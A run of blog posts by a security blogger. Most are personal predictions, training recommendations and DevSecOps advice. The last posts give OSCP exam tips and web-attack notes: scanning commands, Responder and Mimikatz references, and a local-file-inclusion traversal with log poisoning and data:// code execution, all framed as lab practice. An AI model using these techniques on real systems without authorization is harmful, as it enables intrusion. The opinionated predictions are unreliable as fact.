This year I’ve also added a subsection for each category with resources that are informing my predictions. This subsection is intended to provide you with more insights and connections for how the predictions fit together, including a few (and sometimes several) links to news articles, blog posts, and other content that led to this year’s predictions.
With that - thank you once again for stopping by to read my random musings 😄
And as with last year’s predictions post, a word of warning: I tend to focus on negative trends when it comes to history and world events, so I think you’ll find my predictions largely err in that direction. Likewise, as an American you’ll find my predictions are heavily influenced by philosophically Western views. If you’re looking for cupcakes and unicorns in my predictions for 2024 - you’ll probably be disappointed, and should maybe skip to the section on Hope 😅 For those not easily disheartened, read on at risk of gazing into the abyss.
🔳 OpenAI announces the release of GPT-5
🔳 Major technology companies replace over 1000 workers with AI
🔳 At least one deepfake political advertisement is publicly aired during the United States elections
🔳 OpenAI loses at least one copyright infringement court battle (and then appeals to a higher court)
🔳 An Open Source Large Language Model (LLM) achieves GPT-4 levels of performance
What’s inspiring these predictions: The rapid pace of developments in Artificial Intelligence (AI) over the last year has been astounding. In little more than a year we went from having ChatGPT running on GPT-3.5 to GPT-4, and then both Google and Meta announced significant improvements to their own models. Given the insane series of events related to Sam Altman’s position at OpenAI, I suspect they also have something cooking that we’ll see an announcement about next year.
Likewise, given how powerful AI is becoming, we’re already seeing companies like Google supposedly replace workers with these new technologies. It isn’t too far-fetched to think that other companies will follow suit if interest rates remain high. It’ll also be interesting to watch how copyright infringement lawsuits play out in 2024 after seeing how frequently AI art generators seem to reproduce copyrighted works.
🔳 India experiences at least one day where the heat index reaches 140 degrees Fahrenheit
🔳 The continental United States experiences at least one day where the heat index reaches 130 degrees Fahrenheit
🔳 At least one Category 5 hurricane strikes the continental United States
🔳 The Panama Canal is closed due to a lack of rain for at least 5 days
🔳 The average price of coffee will exceed $7 per pound
Why I’m making these predictions: As Brazil recently experienced a heat index over 137 degrees Fahrenheit before their Summer season even started, I think that it’s very likely we’ll see similar heat waves crash over both India and the continental United States in 2024. The highest heat index in the U.S. in 2023 reached 125 degrees Fahrenheit, and with global warming showing no signs of slowing down - 2024 is shaping up to be the hottest year on record.
Likewise, with the immense heat being absorbed by the world’s oceans, it’s only a matter of time before we see significant weather pattern changes with devastating impacts to human life and property. In 2023 we saw a world-first occurrence where every tropical ocean saw a Category 5 hurricane, and the Panama Canal has become so dry due to a lack of rain that companies are paying millions of dollars to get through. These warmer temperatures are also reducing coffee yields, which in turn drives the cost even higher.
🔳 At least 25% of Americans will be disabled from COVID-19 (i.e. Long COVID)
🔳 The U.S. Government passes proposed changes to reduce the number of people with disabilities found in the census
🔳 COVID-19 evolves to completely escape the immune system response
🔳 China reinstates universal mask mandates to slow the spread of COVID
🔳 Governments start to recognize the financial loss COVID is having on the economy and reinstate safety regulations
What’s leading to these predictions: In 2023 we learned that at least 14% of Americans have Long COVID, and since both the U.S. Government and the general populace insist that it’s no worse than the seasonal flu (it’s actually 50% more fatal than influenza) there seem to be very few people getting immunized - let alone taking precautions (like wearing a mask). And although it’s still open for public comment, it is becoming abundantly clear that the U.S. Government does not want to recognize the growing train wreck they’ve created by letting COVID-19 run rampant throughout the country.
And since COVID-19 already significantly damages the immune system, I suspect more governments will be driven to implement universal mask mandates as the virus continues to evolve. Thankfully some countries are waking up to the fact that growing rates of Long COVID are significantly impacting their economies, which may spark new life into safety regulations for both medical settings and public transit.
🔳 At least one act of domestic terrorism occurs at a political event and/or polling place during the United States elections which makes global headlines
🔳 Ukraine retakes Crimea through the use of American arms and munitions
🔳 Iran and Syria go to war with Israel over the massacre of Palestinian civilians
🔳 China invades Taiwan
🔳 Ukraine fights to a stalemate with Russia in the Donbas and Luhansk regions
What’s driving these predictions: As unsettling as it is, more Americans say they support political violence as we head into the 2024 election season. As a result of political turmoil boiling over in the United States, state actors will take advantage of the ensuing chaos to settle old scores. We know that President Xi Jinping has already stated his intentions to take over Taiwan, and coordinated actions (by way of Russia) with Iranian and Syrian forces striking Israel could be the opening that China needs.
Unfortunately, I believe that global conflicts will further distract from the war in Ukraine - which will further hinder Ukraine’s ability to reclaim the Luhansk and Donbas regions. I am personally very hopeful that Ukraine will retake Crimea in 2024, which I believe will have significant implications for Russia’s will to continue the fight.
🔳 Mounting commercial real estate losses lead to significant cuts in Federal interest rates
🔳 Businesses force staff back to the office at least four days a week
🔳 The United States Government fully eliminates remote work as an option for federal employees
🔳 Ozempic and other GLP-1 drugs become severely restricted due to their financial impacts on major retailers
🔳 Core inflation remains above 2.75% in the United States
What’s leading to these predictions: Empty office buildings are allegedly threatening the economy, and it’s leaving big banks holding the $1.5 Trillion bag (won’t someone think of the shareholders? 🙄). Because of this President Biden is already forcing federal employees back to the office more frequently - even though they’re probably spending a majority of their time on virtual meetings with people in other offices… Anyway - I’m sure you see where I’m going with this.
Aside from commercial real estate woes and CEOs wanting to reinstate feudalism, the impacts to capitalism that GLP-1 drugs (such as Ozempic, Wegovy, and Mounjaro) are having are clearly alarming investors. Lord knows we can’t be scaring the rich by treating people for the negative effects consumer capitalism has had on their lives 🙄 and to make up for these losses, I suspect corporations will continue the price gouging behaviors we saw in 2023 - which will sustain inflation above 2.75% next year.
🔳 A Top 10 technology company experiences a major security incident attributed to non-state actors
🔳 A Form 8-K breach notification filing with the Securities and Exchange Commission (SEC) leads to a 10% drop in a publicly listed company’s stock value
🔳 At least one CISO will face charges of fraud from the SEC due to a security incident
🔳 A United States utility company is hit with ransomware and service to customers is impacted
🔳 A major Israeli security company experiences an impactful security incident attributed to a state actor
What’s inspiring these predictions: 2023 was rife with security incidents, and I suspect we’re going to start learning about a whole lot more of them now that the SEC requires Form 8-K to be filed within four business days of a security breach. With how big of a target the MANGA+ companies are, it’s entirely possible that we could see the first two predictions occur simultaneously.
Beyond that, I believe the SEC is just getting warmed up when it comes to going after corporate leaders for failure to properly attest to the state of their cyber security practices. Moreover, given how frequently utility companies seem to be in the news for security incidents - it’s entirely possible that one such publicly traded company’s CISO could find themselves in the hot seat after a widely reported customer-impacting incident.
Finally, in conjunction with my Global Conflict predictions, I suspect at least one of the major Israeli cyber security companies will be successfully targeted by state actors looking to incur financial damage - or to further compromise the Israeli security company’s customers.
🔳 Twitter is sold at a significant loss to new ownership
🔳 Amazon replaces at least 25% of their warehouse workforce with robots
🔳 Portable nuclear reactors start being mass-produced
🔳 A lucid dreaming device becomes commercially available for use
🔳 Non-screen based connected devices (think Humane’s AI pin) will totally flop
What’s generating these predictions: Twitter is flailing after a year under Elon Musk’s leadership, and the outbursts have only become more erratic as the year progressed. At this point I can’t see it ending any other way than a write-off sale to a new owner. Sadly I don’t think it’ll ever return to being what it was now that it’s turned into a virtual incel nazi bar 🤷
Moving on - now that Amazon has started testing humanoid robots in warehouses I fully expect them to ramp up their use in 2024. If I had to guess, they’ll probably start with the unionized locations. If they can somehow manage to pair these robots with portable nuclear reactors for power generation, then they just might blow past the 25% prediction.
As for Amazon’s non-warehouse workers (and probably Wayfair’s workers, too) the new year brings the prospect of being made to write code while you sleep through lucid dreaming. Personally I was hoping for something a little less dystopian that would allow me to experience an Isekai anime lifestyle. Speaking of gadgets - I’m totally expecting the Humane AI pin to flop. Way too much content is oriented around screens, and the world feels like it’s becoming far too dystopian to make people want to stop and look around.
🔳 A universal COVID-19 vaccine that prevents infection is discovered
🔳 Masks (once again) become universally required in medical settings in the United States
🔳 Donald J. Trump is prevented from running for office due to criminal conviction(s)
🔳 Russian aggression in Ukraine comes to an end after Vladimir Putin suffers a life-threatening illness
🔳 The United States produces more than 47% of its energy from zero-carbon sources
Why I’m still hopeful: Honestly I don’t have much to go on here other than the fact that these are things which I continue to hold out hope for. Preventing infection continues to be the only means by which one can avoid the risks of Long COVID, and it would be really great to see a universal vaccine produced that the virus can’t out-evolve. In the meantime, five states have returned to mask mandates in hospital settings - now we just need more states (and countries) to do the same!
On an entirely separate note, I think the world could find itself in a much more peaceful state if the United States elections aren’t as volatile as they’re shaping up to be. A new Republican candidate for president on the ticket would certainly help us take a few steps back from falling over the precipice of Authoritarianism. Who knows, it might even cause Vladimir Putin to get so mad he comes down with a life-threatening illness - maybe even a fatal encounter with gravity!
Finally, we all know that climate change is rapidly accelerating - it would be pretty amazing if we could make meaningful progress toward adopting zero-carbon sources for energy with haste.
Thank you once again for stopping by 😊 While taking some time to rest and prepare for what’s in store for next year, you can git checkout other (usually off-topic) content I’m reading over at Instapaper - or review my series on the DevSecOps Essentials which (sadly) continues to be relevant guidance for many companies. Here’s hoping we turn things around in 2024!
And until next time, remember to git commit && stay classy!
Cheers,
Keith // securingdev
If you found this post useful or interesting, I invite you to support my content through Patreon 😊 and thank you once again for reading this content!
And as with last year’s predictions post, a word of warning: I tend to look for negative trends when it comes to history and world events, so I think you’ll find my reflections will largely err in that direction. Likewise, as an American you’ll find my reflections are heavily influenced by philosophically Western views. If you’re looking for cupcakes and unicorns in my reflections on 2023 - you’ll probably be disappointed and should maybe skip this post 😅 For those not easily disheartened, read on at risk of gazing into the abyss.
While the media’s silence on COVID-19 regarding the serious effects it has on people’s lives continued in 2023, we now know that at least 14% of Americans have Long COVID. Unfortunately, this has also led to a few of my predictions coming to pass:
✅ Spawning even more infectious variants of COVID-19
✅ Second-order outbreaks of other infectious diseases
✅ Second-order effects in China hindering their economy after adopting a Western-style mass infection strategy
I’ll have more to say on this in my upcoming “Predictions for 2024” post, but sadly it feels as though we’re heading toward an even darker place as it relates to COVID-19 and the way both governments and the general populace are thinking about this debilitating virus.
Hint: COVID-19 is 50% more lethal than influenza (“the flu”), which everyone keeps thinking it can be compared to.
I expected China’s COVID-19 mass infection strategy to have significant impacts in 2023, and surprisingly we didn’t hear much about this. If the things I read online this year are at least somewhat representative of people’s behaviors on the ground in China, the reason the impacts I predicted didn’t materialize can be traced to the population continuing to take precautions against the virus - even without their Government’s requirement to do so.
That said, here’s how my predictions stacked up this year:
❌ Significant supply chain impacts from China’s COVID-19 mass infection strategy
✅ Long COVID leading to worker replacement economic impacts
As a result of hanging my predictions off the expected impacts of COVID-19 running rampant in China - which didn’t materialize to the extent that I thought they would - we thankfully avoided one of my predictions for 2023, while others hit the bullseye:
❌ Inflation continues to run amuck at high single-digit percentages
✅ Financial markets experience downward pressure as federal banks raise interest rates
✅ Corporations continue to report record profits
Here I once again can see the folly of hanging my predictions off China’s mass infection strategy. The first prediction in this section was also something I expected would cascade into my second prediction - but neither came to be:
❌ Lead times for core networking infrastructure continue to increase
❌ Cloud adoption scales as datacenter hardware becomes expensive / hard to acquire
I’ll have more to say on this in my “Predictions for 2024” post, but if China invades Taiwan I think all bets are off in sectors involving semiconductors and CPU / GPU chips. There’s still time (and increasing likelihood) for these predictions to become true - just not in 2023.
It’s a surefire bet every year that data breaches will happen - and this year we witnessed some very large incidents indeed. Even so, the reason I predicted more data breaches would occur was largely because I expected more companies to bring insecure software to the cloud. Turns out companies were already using badly insecure software in the cloud due to commercial, off-the-shelf products. I think I at least deserve some partial credit here under the circumstances:
✅ / ❌ Historic volume of data breaches and security incidents (but not for the reason I proposed)
Of the categories that I had the most hope for this year, this one had the greatest positive outlook when the year started - and the most bleak outlook as we come to the end of the year with plenty of thanks to authoritarian (some might even say fascist) influences. Thanks, American Republicans and Viktor Orban!
❌ Ukraine takes back Crimea
❌ Putin falls out of a very high window (but we were so close!)
❌ Putin goes Nuclear in Ukraine (I’m glad to be wrong about this!)
❌ China invades Taiwan (but still in the cards for 2024)
The world broke all kinds of (very bad) climate records this year - and while I was wrong about a very specific prediction, the general trend we’re heading in is bad indeed:
✅ Catastrophic climate events [1] [2] [3]
❌ Hoover dam reaches “dead pool” level
There’s plenty more to be said here about what we should expect in 2024, but I’ll save that for my next blog post. In the meantime, I’ll just leave this here: utility firms are paying builders to install gas appliances in homes.
Of the things I hoped for, only the one prediction I really didn’t want to see happen took place (thanks, capitalism). That said, I really would have liked to see us break the cycle of mass infection regarding COVID-19, which will inevitably lead to a whole host of negative outcomes that we’re just now starting to see play out (in spite of how much governments would like us to ignore the virus behind the curtain). More to come on this in my next blog post.
✅ Corporations continue price gouging in spite of lower interest rate increases
For those keeping score, here’s how things turned out with my predictions for 2023:
✅ Ten accurate predictions
❌ Ten inaccurate predictions
Womp womp 🎺 so my predictions for 2023 were no better than a coin toss. Personally, I blame my over-reliance on predicting the impacts of China’s COVID-19 mass infection strategy for a cascade of missed predictions - and will definitely take this into account when I write my “Predictions for 2024” blog post later this week.
In the meantime, thank you again for stopping by to read my pseudo-random musings 😊 While taking some time to rest and reflect here at the end of 2023, you can git checkout other (usually off-topic) content I’m reading over at Instapaper - or read my series on the DevSecOps Essentials which sadly continues to be worthwhile guidance for many companies. Here’s hoping we turn things around in 2024!
This year’s “Great Reads” is filled with a multitude of fun, useful, enjoyable, interesting, concerning, and sometimes downright enraging content. Needless to say, there’s an abundance of food for thought across multiple topics of interest (and importance) - and like a buffet, I encourage you to try a little bit of everything.
Enjoy!
As always, thanks again for browsing through another year’s “Great Reads” 😊 While I prepare my next blog post reflecting on my Predictions for 2023, you can git checkout other (usually off-topic) content I’m reading more regularly over at Instapaper.
At first, I thought that getting back into hacking web apps would be easy. After all, five years ago I ranked amongst the Top 100 security researchers on Bugcrowd (my highest rank was 64th) and was named as one of the MVPs in 2018. How hard could it be?
Well, I hadn’t accounted for the fact that my web hacking skills had become dull and rusted without practice - and I certainly hadn’t considered the fact that securing web applications has become a lot easier for companies to implement. Cloud Web Application Firewalls (WAFs) and Runtime Application Self-Protection (RASP) technologies offered by Content Delivery Networks (CDNs) have become a lot more ubiquitous. Being a successful bug bounty hunter requires a lot more skill in 2023 - so if you’re struggling, I’m right there with you!
To get a jump on learning about newer bug bounty hunting techniques, I reconnected with my sensei (Jason Haddix) and signed up for his Bug Hunter’s Methodology Live Course. I credit Jason for a lot of my early success in the Bug Bounty scene; working for him at Bugcrowd exposed me to a lot of his out-of-the-box thinking and techniques. I count myself fortunate to have built a great friendship with Jason, which continues to this day ❤️
Anyway, Jason’s two-day course is absolutely packed with the kind of “secret sauce” techniques that allowed me to hit the Top 100 back in 2018. He’s also added a ton of updated content related to new tools and techniques he’s adopted - including access to homegrown scripts, as well as techniques leveraging novel Artificial Intelligence (AI) technologies.
Whether you’re just starting out on your Bug Bounty adventure or looking to up your game - you can’t go wrong with spending $550 on this course - and you’ll get 5% off if you use this link 😉 The course will certainly pay significant dividends throughout your hacking career, and you’ll definitely learn a ton if you spend 16 hours with Jason (along with the special guests he invites to present) during the live course.
This content was written by a human being; if you find it useful, enjoyable, or influential you can support my work via Patreon. As always, thank you for being here and reading this content! 😊
After taking Jason’s course, the next thing I started doing was diving into API security testing - and to me, this space still feels like a new frontier in AppSec. Firstly, there aren’t any clear-cut “winners” in this space from a security products perspective (yet). And secondly - if I’m being candid - it’s still not an area most application / product security teams are spending time on right now. This is partly because there aren’t many well-known security technologies in the space, and partly because most security professionals still don’t know how to write software - let alone build relationships with their development teams.
Regardless, to skill-up in this space I signed up for APISec University’s API Penetration Testing course, where I recently earned a certificate; I will fully admit that I listened to Corey Ball’s training sessions on 1.25x speed in order to keep from getting bored 😅 I guess I’m just a little too “New England impatient” sometimes 😬
Anyway - as far as free courses go, this one was pretty good. Corey walks students through setting up Burp Suite Community, Zed Attack Proxy, and Postman - as well as a couple of open source vulnerable web apps to practice with. If there was one thing I think this course could have improved upon, it would be spending more time in the vulnerable web applications to get more hands-on practice for the section quizzes. This is definitely something I feel like I should probably go back and do regularly to stay sharp with my new set of skills.
I am super excited by what PortSwigger has put together with their Web Security Academy learning modules. It has never been easier to pick up Application Security skills for free 🎉 The new learning paths for Server-side Vulnerabilities and SQL Injection are particularly well-built in terms of their ability to provide concise bundles of knowledge, along with links to useful resources and tightly scoped practical labs.
I’m a huge fan of the hands-on learning approach that PortSwigger has implemented with these trainings - and I am doubly thankful that they have solution walkthroughs for those times when I get stuck. Those moments between getting frustrated and getting that one little hint I need in order to keep making progress are where I find the learning really happens for me. Whether it’s practicing unfamiliar techniques or figuring out new ways to use Burp Suite, I am frequently going back and making notes on additional questions to ask myself when performing security assessments.
Last, but certainly not least in my training regimen has been the Critical Thinking Bug Bounty podcast. Listening to Joel and Justin talk about the interesting techniques that they’re using, learning, or reading about gives me a ton of energy and drive to keep practicing and learning new techniques in this space.
It’s also really helpful that Joel and Justin interview guests from time-to-time on the podcast, as it exposes listeners to new ways of thinking about hacking, as well as new tools and techniques to learn more about when bug bounty hunting. Don’t sleep on this podcast if you’re looking to expand your learning opportunities!
As always, thanks again for stopping by to read my pseudo-random musings 😊 While I draft my next blog post, you can git checkout other (usually off-topic) content I’m reading over at Instapaper - or go back and read my other OSCP content for additional tips-and-tricks.
That one simple trick: Communicating regularly with developers!
And before anyone claims they’re already doing this: telling developers to fix the vulnerabilities your tools are finding does not count as “communicating”. Here are a few questions worth asking to determine if you’re actually communicating with developers:
I can’t tell you the number of times I’ve heard security professionals claim that fast scans are required by their development teams. But here’s the thing - unless your business is operating like Netflix or Shopify and releasing code directly to production after passing automated tests, this really does not apply to your situation. And if you don’t believe me - here’s a question for you:
Does your development team require a code review before merging new code?
If your company is using the same “best practices” as most other companies, the answer is almost certainly “yes”. And if the answer is “yes”, it begs the next question: how long does it take for a pull request to receive a code review? Hours? Days? If that’s the case, then so long as the developer still has a good context of the code that was scanned - meaning within a reasonable amount of time - then faster scans hardly make a difference.
But you know what will make a difference in slowing down the development process? The amount of bullshit findings your scanning tools produce.
If there’s one universal law when it comes to security tools, it’s this: you’ve got speed, accuracy, or completeness - and you can only choose two.
The unfortunate thing about pretty much every tool on the market today that optimizes for speed is that they try to make it really easy for security teams to use without considering developer impacts. As a result, such tools almost always dump a mountain of findings on your developers. Sure, these tools are “accurate” in that they’ve found a bunch of things wrong in the code - but they rarely seem to take into account the threat model associated with their findings. Oh no! You can generate a SQL injection by changing a database table name in the configuration file! Anyway…
When it comes to scan speed, you played yourself - because the scan took five to ten minutes producing these kinds of findings; now you’re going to spend hours in meetings across several weeks discussing finding validity. This is how security teams hold up the development process. Security’s five to ten minute scans often prevent developers from moving on to the next project, and impact their OKRs / KPIs.
Meanwhile, during all that time sending passive aggressive emails back-and-forth regarding the validity of the security findings, very little is getting fixed - and the business is no more secure now than it was when the findings were produced. The only thing being impacted here is the Development team’s productivity. It’s no wonder they’re pissed off at security teams.
By now I’m sure some of you are thinking - why don’t we just tell the Developers what to fix? And sure, you could spend time reviewing the findings on behalf of the developers - but what leads you to believe that the two to five Security Engineers reviewing thousands of findings are going to be any faster than modern security tools at eliminating hundreds (and sometimes thousands) of false positives? Manually reviewing security findings is an incredibly poor use of time for expensive security resources.
Likewise, if we think telling developers they need to use certain tools (without considering their input) is going to somehow magically solve the problems outlined above, we’re kidding ourselves. More often than not this practice just leads to development teams delaying security scans until it’s too late to stop their momentum - and any attempt to try and delay things further only leads to the wrath of an Engineering VP crashing down on Security’s doorstep.
So how can we avoid all of this back-and-forth in the first place? It’s simple: by communicating more frequently with development teams.
Start by asking yourself these (and similar) questions:
When Security spends time building trusting relationships with Engineering teams, a ton of potential can be unlocked to streamline development and security processes. One of the first things you should do to build trust is ask Engineering teams to participate in conversations involving the selection of Security tools.
Your development teams have experienced first-hand the kinds of pain Security tools can cause, and there’s no one better to help figure out the best way to implement Security tools than the teams who will be responsible for using them. This is doubly true if the Engineering team knows that it will be migrating to a new platform - since the Security team will need to figure out how to support the new platform after the move. Having an early warning here will help avoid costly investments (in terms of time, money, and people) that end up being useless after such changes.
More importantly, security teams need to take action on the feedback that developers provide as it relates to the security tools. The moment we start ignoring these important voices in the process is the moment we begin to lose the trust and goodwill of our colleagues. If your development team is complaining because the security tool you’ve implemented quickly produces a load of garbage results, listen to them! Ask for their support in tuning the tool - or even better, ask them to participate in the selection process for a new tool!
A lot of people talk about building Security Champions - and taking action on feedback by inviting developer participation is your best opportunity to do just that!
If Developers generate Technical Debt, then AppSec generates Security Delay. The best we can hope for is to reduce that delay by removing as many false positives as we can from the results of our tools - and by getting developers to use the tools more often.
The whole process starts by collaborating with development teams to implement the right security tools in the right locations along the Continuous Integration / Continuous Delivery (CI/CD) journey. Although if I’m being honest, very few companies actually practice Continuous Delivery - it’s more like Continuous Integration / Periodic Deployment.
Anyway, as I was saying earlier - if we want developers to use the tools we select, there’s no better way to improve adoption than by including them in the selection process. If Development teams have skin-in-the-game when it comes to the quality of the tools selected, they will help you select tools that produce fewer false positives. Developers are also more likely to remediate the findings produced by tools they helped select - and will sometimes jump in to help tune things if necessary!
You can’t do DevSecOps without doing DevOps - and DevOps is just communication, coordination, and collaboration.
Moreover, communicating regularly with Developers doesn’t require a line in the budget - and gathering their input when selecting Security tools dramatically improves both security tool adoption and security finding remediation rates.
So what’s stopping you from 10x’ing your AppSec Program?
Thanks again for stopping by to read my pseudo-random musings 😊 While I draft my next blog post, you can git checkout other (usually off-topic) content I’m reading over at Instapaper - or review my other posts on DevSecOps for lessons learned from my practical experience in a Fortune 100 global enterprise.
Until next time, remember to git commit && stay classy!
Cheers,
Keith // securingdev
If you found this post useful or interesting, I invite you to support my content through Patreon 😊 and thanks once again to those who already support this content!
… and then I took the exam again a month later - and this time, I passed. This post is about how I turned things around in just 30 days in order to become an Offensive Security Certified Professional, and it all starts with having a really solid playlist to listen to while hacking. And with that queued up - let’s do this!
One of the ways the Offensive Security team raises the level of difficulty on the exam is to throw in a lot of avenues for students to attack. It’s important to quickly discern what represents a real opportunity to gain a foothold on the target system, and what has been thrown in to waste your time. There are a few questions you can ask yourself when enumerating a system with a lot of open ports:
- Is there anonymous FTP on port 21, or telnet on seemingly random ports that my recon process found?
- Have I updated my /etc/hosts file with the computer name? Have I browsed to HTTP and HTTPS versions of the site on those other HTTP ports?
- Can I point the application at a UNC path like \\ip-address\sharename\filename? Have I set up Responder with the following (exam-allowed) syntax to exercise the app in this way: sudo responder -I tun0 -v -A
- Are there unusual ports open (like 8099 and/or 9099)? Have I looked through searchsploit to see if anything sticks out as remotely exploitable?
Usually by the time you’ve run through such questions, you’ll have found a path forward. Know that on the OSCP open attack paths are not a mistake - so if your gut is telling you that some particular foothold is the path forward, then follow it until the end.
And most importantly - if you hit a wall and nothing you’re doing is working, then either you’ve chased the rabbit hole to the end, or you need to take a break / pivot and come back to it later. So long as you have taken good notes on what you’ve tried so far, and what you might like to try when you get back to it, then it’s okay to move on and come back to the target later on.
In the coming weeks I’ll be publishing a blog post (or possibly two) on the specific things I look for when attacking a Windows machine - but the most important thing to remember is that at least 50% of your targets on the OSCP exam are going to be Windows machines. Gaining Administrator on the Domain Controller system is required to pass the exam. Spending lots of time getting comfortable with Windows systems - especially when you’re stressed and facing time constraints during the exam - is going to be worth it.
To help you get a leg-up on the process of obtaining nt authority\system privileges, I recommend taking a good look at Windows Privilege Escalation Awesome Scripts, as well as Guifre Ruiz’s Windows Escalation of Privilege notes. Being able to recognize Unquoted Path, insecure backups, and DLL Hijacking opportunities at-a-glance is going to make the process of hacking Windows systems that much easier.
Then, when it comes to lateral movement, knowing exactly which Mimikatz commands to run and having those ready to copy-and-paste from your notes will save you a ton of time. You’ll then need to know how to make use of those credential hashes - whether by cracking them with Hashcat, or using Pass-the-Hash / Pass-the-Ticket techniques with tools like impacket-psexec, evil-winrm, or xfreerdp. If you’ve done your recon, it should be pretty obvious which tools and techniques you’ll need to use when moving laterally into the next Domain machine.
This content was written by a human being; If you find it useful, enjoyable, or influential (and have the coin to spare) - you can support my work via Patreon.️ Thank you to those who already support this blog! 😊 And now, back to that organic content you were enjoying! 🎉
The time constraints on the exam are there to add a certain amount of stress - which is intended to test how well you actually know what you’re doing. On my first attempt it took something like 3.5 hours for me to gain nt authority\system privileges on the exposed Active Directory machine. On my second attempt, it took me 2.5 hours to achieve the same outcome. After that it took me another 5 hours of hands-on-keyboard effort to gain nt authority\system access on the 2nd machine. Four of those five hours were spent running into a wall before I stopped for the night and got some sleep.
You see, every night after having dinner with my wife and watching a T.V. show, I would go back upstairs to practice in the PEN-200 labs around 7:00 p.m. - I had built up a habit of thinking about hacking for at least a couple of hours before going to bed. Having this regular routine made my first exam attempt feel a little more familiar - and made my second attempt feel natural.
Getting four hours of sleep that night, taking a refreshing shower in the morning, and having a relaxed breakfast afterward helped set the pace for the rest of the exam. It took me less than an hour after getting back to the keyboard to gain Administrator on both that machine from the night before, as well as the Domain Controller. At that point I had 12 hours left on the exam and 40 points accumulated toward my final score.
The lesson here is that it’s super important to take breaks, get some sleep, and eat properly. But more than that - having a routine that you follow leading up to the exam will help you identify the best time for you to schedule your exam attempt; for me that was 7 p.m. Eastern time.
Every time I completed a “goal” (gaining Local or Administrator access), I would stop to make sure I had all of the commands written down and screenshots I needed for evidence, and then kick-off my automated tools for Privilege Escalation and/or Lateral Movement. While these were running, I would take a 10-15 minute break to go to the bathroom, grab a snack, fill my water bottle, and share news on my progress with my wife. Between her encouragement and the chance to step-away and think, I felt modestly rejuvenated and eager to proceed every time I sat back down at my keyboard.
I would likewise take a short break when I hit a wall and needed to reset. This was a good opportunity to reflect on what I had tried so far, and to ask myself whether I should pivot to something else or if I felt like I had enough options in front of me to keep going. Toward the end of the exam I started setting loose targets on what I wanted to accomplish with my remaining time.
Ultimately I ended up spending something like 3 hours on a stand-alone box that I only ever got Local user access on before pivoting back to a stand-alone box that I had initially started early in the day and quickly pivoted away from. When I pivoted back to that original stand-alone box from earlier in the day, it was like my entire mindset had somehow done a backflip - because I quickly gained not only Local user access, but Administrative access shortly after the pivot.
Sometimes, all your brain really needs is a change of perspective for the gears to go into motion. My strategy for approaching the exam was as follows:
Some of the best advice I received prior to taking the exam was to start writing the report before my access to the exam lab ended (thanks Craig!). This helped guarantee that I had all of the screenshots I needed for both Local and Root / Administrator proofs for all of the boxes I had pwned. It also allowed me to make sure the screenshots I had taken accurately reflected the commands and steps I used to obtain access to the machines.
In terms of how I went about writing my report, I used a Notion template shared with me by c0nsid3rate. This made the entire process a LOT easier, and the final document was only 4.1 MB in size after adding 47 screenshots and writing 55 pages of documentation.
Working from a template will prompt you for things you need to include on the report in order to pass the exam - so don’t skip the process of looking over the official Offensive Security report template examples before you start writing your report.
By the time I stepped into my second exam attempt, I had already gained root / administrator privileges on forty of the PEN-200-2022 lab machines, eighteen of the PEN-200-2023 lab machines, and completed 94% of the chapter exercises. In the process I had earned 10 bonus points for the exam, and built a wealth of experience along with a mountain of notes to show for it. Those 10 bonus points make a huge difference come exam day - because it means you only need the Active Directory set and two Local user shells on the stand-alone boxes to earn enough points to pass the exam.
And as I said in my very-first blog post in this series: practice is the difference between wanting to be a 1337 H4x0r, and actually becoming one. The only way you’ll really know what to look for, what steps to take, and what attack vectors to pursue is by putting in the work - and that means getting in the lab and practicing every week.
As always, thanks again for stopping by to read my pseudo-random musings 😊 While I draft my next blog post, you can git checkout other (usually off-topic) content I’m reading over at Instapaper - or go back and read my other OSCP content for additional tips-and-tricks.
Until next time, remember to git commit && stay classy!
Cheers,
Keith // securingdev
If you found this post useful or interesting, I invite you to support my content through Patreon 😊 and thanks once again to those who already support this content!
That said - as I stated in my original “Hacking the OSCP” blog post: there is no substitute for practice. Or doing the exercises. Or spending some time reading through chapters on content you’re less familiar with. The notes shared in this post represent the most useful and repeatable steps within my process - but are by no means comprehensive. The only way to truly build the habits and confidence you need in order to be successful is to do the work.
When I first discover open ports 80, 8080, 443, 8443, 3306, etc. as part of my recon process one of the first tools I run is Nikto:
nikto -host=http://website-ip/or-domain -maxtime=30m -o <output-file>
Depending on the type of site (like if it’s a WordPress website) I would instead run WPScan:
wpscan --url http://website-ip/or/domain -U 'username1,username2' --enumerate u
Regardless of the type of site, I’ll usually try running some directory busting tools such as dirb, gobuster, and ffuf:
Using dirb (-r to scan non-recursively, -z # to add a delay in milliseconds between requests):
dirb http://<site-address> -r -z 10
Using gobuster for directory discovery (newer gobuster releases refuse to run when -s is combined with the default 404 blacklist, so pass -b '' alongside -s):
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/common.txt \
  -s '200,204,301,302,307,403,500' -b '' -u http://<ip-address> | \
  tee -a <filename>
Using gobuster for file / endpoint enumeration:
gobuster dir -u http://<ip-address>/ \
  -w /usr/share/seclists/Discovery/Web-Content/CGIs.txt \
  -s '200,204,301,302,307,403,500' -b '' -e | tee -a <filename>
Using ffuf to fuzz directories recursively:
ffuf -c -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt \
  -u http://$IP:$PORT/FUZZ -recursion -recursion-depth 2
While my automated scans are running in a terminal screen session, I’m usually walking the site manually with Burp Suite proxying requests so that I better understand the layout of the site. Here are a few things I look for:
- What information can I gather from the URL? Extensions like .jsp and .do (Java), .html, and .php all tell you a lot about what language(s) are being used.
- Using the browser debugger: ctrl+shift+K for Firefox (or the Web Developer menu).
- Looking for hidden values / fields: search for input elements in the page source.
- Take a look at the response headers: Debugger → Network tab → Headers sub-tab.
- Inspect sitemaps:
curl https://<site-address>/robots.txt
curl https://<site-address>/sitemap.xml
- Get site version information from the response headers:
curl -i <ip-address>
- Reading the website in the terminal:
curl <ip-address> -s -L | html2text -width <num> | uniq
- Common administration console locations: /manager/html for the Tomcat manager, and /phpmyadmin for phpMyAdmin (MySQL) panels.
PHP applications, at least in the context of the OSCP labs, are notorious for having local and/or remote file inclusion vulnerabilities. Local file inclusion (LFI) is commonly exploited using directory traversal techniques.
Browse to your target destination (Linux example):
http://<ip-addr>/LFI.php?file=../../../../../../var/log/apache2/access.log&cmd=ls
Note that including the Apache access log only gets you command execution after you have poisoned the log - for example by sending a request whose User-Agent header contains a short PHP snippet that runs the cmd parameter - so that the included log contains PHP for the interpreter to execute; until then, cmd does nothing.
Using the PHP manual’s list of supported protocols and wrappers, you can find wrappers that let you execute code, such as data:// (which requires allow_url_include=On on the target):
LFI.php?file=data:text/plain;base64,<base64 encoded PHP code>&cmd=id
